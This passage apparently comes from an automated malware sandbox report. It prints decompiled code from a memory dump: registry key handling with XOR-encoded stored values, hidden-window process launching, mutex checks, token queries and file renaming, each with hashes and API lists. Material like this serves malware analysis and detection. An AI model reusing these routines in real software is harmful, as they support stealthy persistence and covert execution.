				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0xe9fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0xe9fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0xe9fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0xe9fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0xe9fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0xe9fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0xe9fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0xe9f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00089b4c
0x00089b4e
0x00089b51
0x00089b53
0x00089b5b
0x00089b5e
0x00089b65
0x00089b6d
0x00089b6f
0x00089b75
0x00089b7e
0x00089b86
0x00089b8c
0x00089b93
0x00089b99
0x00089b9b
0x00089b9e
0x00089ba0
0x00089ba0
0x00089ba0
0x00089ba8
0x00089bab
0x00089bb0
0x00089bb3
0x00089bb6
0x00089bb8
0x00089cee
0x00089cee
0x00089cf4
0x00089cfb
0x00089d3c
0x00089d40
0x00089d41
0x00089d47
0x00089d4c
0x00089d4f
0x00089d4f
0x00089d51
0x00000000
0x00089d51
0x00089d00
0x00089d0a
0x00089d13
0x00089d18
0x00089d1b
0x00089d1e
0x00000000
0x00000000
0x00089d20
0x00089d24
0x00089d25
0x00089d2a
0x00089d2b
0x00089d2e
0x00089d32
0x00089d37
0x00000000
0x00089bbe
0x00089bbe
0x00089bcb
0x00089bd1
0x00089bd4
0x00089bd6
0x00089ceb
0x00000000
0x00089ceb
0x00089bdf
0x00089be3
0x00089beb
0x00089bf2
0x00089bf5
0x00089bf8
0x00089d54
0x00089d57
0x00089d6f
0x00089d72
0x00089d74
0x00089dc8
0x00089dcb
0x00089dcd
0x00089dcf
0x00089dcf
0x00089dd5
0x00089dd8
0x00089dd8
0x00089ddd
0x00089de4
0x00089dea
0x00089def
0x00089df2
0x00089df4
0x00089e0b
0x00089e11
0x00000000
0x00000000
0x00000000
0x00000000
0x00089df6
0x00089df6
0x00089e02
0x00089e06
0x00089e07
0x00089e07
0x00000000
0x00089df6
0x00089d79
0x00089d86
0x00089d89
0x00089d8b
0x00089dba
0x00089dbd
0x00089dbf
0x00089dc1
0x00089dc1
0x00089dc3
0x00000000
0x00089dc3
0x00089d8d
0x00089d96
0x00089da2
0x00089dad
0x00000000
0x00089db2
0x00089bfe
0x00089bff
0x00089c02
0x00089c07
0x00089c0b
0x00089c10
0x00089c13
0x00089c16
0x00089c18
0x00000000
0x00000000
0x00089c29
0x00089c31
0x00089c34
0x00089c36
0x00089cab
0x00089cb3
0x00089c38
0x00089c3a
0x00089c49
0x00089c51
0x00089c57
0x00089c5a
0x00089c62
0x00089c65
0x00089c6f
0x00089c72
0x00089c77
0x00089c7a
0x00089c7c
0x00089c7e
0x00089c81
0x00089c83
0x00089c85
0x00089c85
0x00089c83
0x00089c91
0x00089c9c
0x00089ca1
0x00089ca4
0x00089ca4
0x00089cc3
0x00089cc8
0x00089cce
0x00089cd1
0x00089cd3
0x00089cd9
0x00089ce2
0x00000000
0x00089ce8
0x00089bb8
0x00089b77
0x00000000

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
Opcode Fuzzy Hash: 2e02a3581bfa86ee0236564b08f4adab1e49b8db52c5e66971988f717cc598b6
Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A0AB, Relevance: 4.6, APIs: 3, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x0008a0b8
0x0008a0bd
0x0008a0bf
0x0008a0c2
0x0008a231
0x0008a231
0x0008a231
0x00000000
0x0008a0d2
0x0008a0d2
0x0008a0d4
0x00000000
0x00000000
0x0008a0da
0x0008a0e3
0x0008a0e6
0x0008a0e7
0x0008a0ef
0x0008a0f2
0x0008a0fd
0x0008a10d
0x0008a112
0x0008a115
0x0008a11e
0x0008a126
0x0008a12b
0x0008a130
0x0008a13d
0x0008a13f
0x0008a146
0x0008a14b
0x0008a14e
0x0008a156
0x0008a163
0x0008a168
0x0008a16e
0x0008a177
0x0008a17d
0x0008a180
0x0008a181
0x0008a193
0x0008a1a3
0x0008a1af
0x0008a1b4
0x0008a1b7
0x0008a1b9
0x0008a1c3
0x0008a1de
0x0008a1e1
0x0008a1e3
0x0008a1fe
0x0008a201
0x0008a203
0x0008a205
0x0008a207
0x0008a207
0x0008a210
0x0008a1e5
0x0008a1e5
0x0008a1e7
0x0008a1e7
0x0008a219
0x0008a21f
0x0008a226
0x00000000
0x0008a22d
0x0008a134
0x00000000
0x0008a134

APIs

Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
Opcode Fuzzy Hash: a869f1493576e0564957202c263c6ba23f2199c5f3dac02cda2040495ac44554
Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008A911, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0xe9f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x0008a91c
0x0008a925
0x0008a92c
0x0008a934
0x0008a938
0x0008a939
0x0008a93a
0x0008a93b
0x0008a93c
0x0008a941
0x0008a945
0x0008a948
0x0008a948
0x0008a955
0x0008a971
0x0008a9ae
0x0008a973
0x0008a976
0x0008a978
0x0008a97b
0x0008a980
0x0008a988
0x0008a990
0x0008a990
0x0008a988
0x0008a996
0x0008a99e
0x0008a9a1
0x0008a9a9
0x0008a9a9
0x0008a9b6

APIs

memset.MSVCRT ref: 0008A925
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID:
API String ID: 4170947310-0
Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0008b99b
0x0008b99c
0x0008b9a3
0x0008b9ab
0x0008b9af
0x0008b9b8
0x0008b9fe
0x0008b9fe
0x0008b9c5
0x0008b9cd
0x0008b9cf
0x0008b9d5
0x0008b9ee
0x00000000
0x0008b9f0
0x0008b9f5
0x00000000
0x0008b9fb
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d7
0x0008b9d5
0x0008ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
Opcode Fuzzy Hash: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0xe9f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x00085910
0x00085915
0x00085921
0x0008592e
0x00085932
0x0008594a
0x0008596a
0x0008596b
0x0008595a
0x0008595a
0x00085960
0x00085960
0x00085934
0x00085934
0x0008593a
0x0008593a
0x00085917
0x00085917
0x00085917
0x00085973

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x0008a47d
0x0008a485
0x0008a489
0x0008a4a0
0x0008a4af
0x0008a4b5
0x0008a4b8
0x0008a4b8
0x00000000
0x0008a4ba
0x0008a48b
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
GetLastError.KERNEL32 ref: 0008A48B
GetLastError.KERNEL32 ref: 0008A495

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2

Uniqueness

Uniqueness Score: -1.00%

Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0xe9fc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0xe9f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0xe9fc18
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0xe9fc18
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x00086da0
0x00086da6
0x00086dac
0x00086db9
0x00086dba
0x00086dbb
0x00086dc2
0x00086dc8
0x00086dcd
0x00086dcf
0x00086dd1
0x00086ddd
0x00086de2
0x00086de2
0x00086de7
0x00086de9
0x00086dea
0x00086df4
0x00086dfa
0x00086dff
0x00086e01
0x00086e04
0x00086e0a
0x00086e10
0x00086e10
0x00086e26
0x00086e2a
0x00000000
0x00000000
0x00086e39
0x00086e42
0x00086e42
0x00086e46
0x00086e4b
0x00086e52
0x00086e57
0x00086e5d
0x00086e62
0x00086e6a
0x00086e72
0x00086ec0
0x00086ec7
0x00086ec9
0x00086ecd
0x00000000
0x00086ecd
0x00086e74
0x00086e74
0x00086e7c
0x00086e7d
0x00086e82
0x00086e84
0x00086e96
0x00086ea7
0x00086eac
0x00086eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00086e84
0x00086e72
0x00000000
0x00086e57
0x00086ede
0x00086ee4
0x00086e0a
0x00086eeb

APIs

MoveFileW.KERNEL32 ref: 00086EB5

Strings

%s.%u, xrefs: 00086E98

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
Opcode Fuzzy Hash: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752

Uniqueness

Uniqueness Score: -1.00%

Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0xe9fe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0xe9fe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x00082af0
0x00082afa
0x00082afd
0x00082b00
0x00082b05
0x00082b07
0x00082b0d
0x00082b17
0x00082b1d
0x00082b1f
0x00082b24
0x00082b81
0x00082b87
0x00082b8b
0x00082b96
0x00000000
0x00082b9d
0x00082b26
0x00082b28
0x00082b28
0x00082b31
0x00082b35
0x00082b3d
0x00082b43
0x00082b43
0x00082b44
0x00082b49
0x00082b4d
0x00082b63
0x00082b68
0x00082b6e
0x00082b71
0x00082b74
0x00082b74
0x00082b76
0x00082b77
0x00082b7a
0x00082b7d
0x00000000
0x00082b28
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D

Strings

%u;%u;%u, xrefs: 00082B59

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
